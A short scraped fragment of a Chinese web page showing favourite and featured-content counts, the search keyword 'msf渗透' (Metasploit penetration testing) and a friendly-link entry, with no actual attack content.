收藏数 7,669
精华内容 3,067
关键字:

msf渗透

友情链接: FIR.zip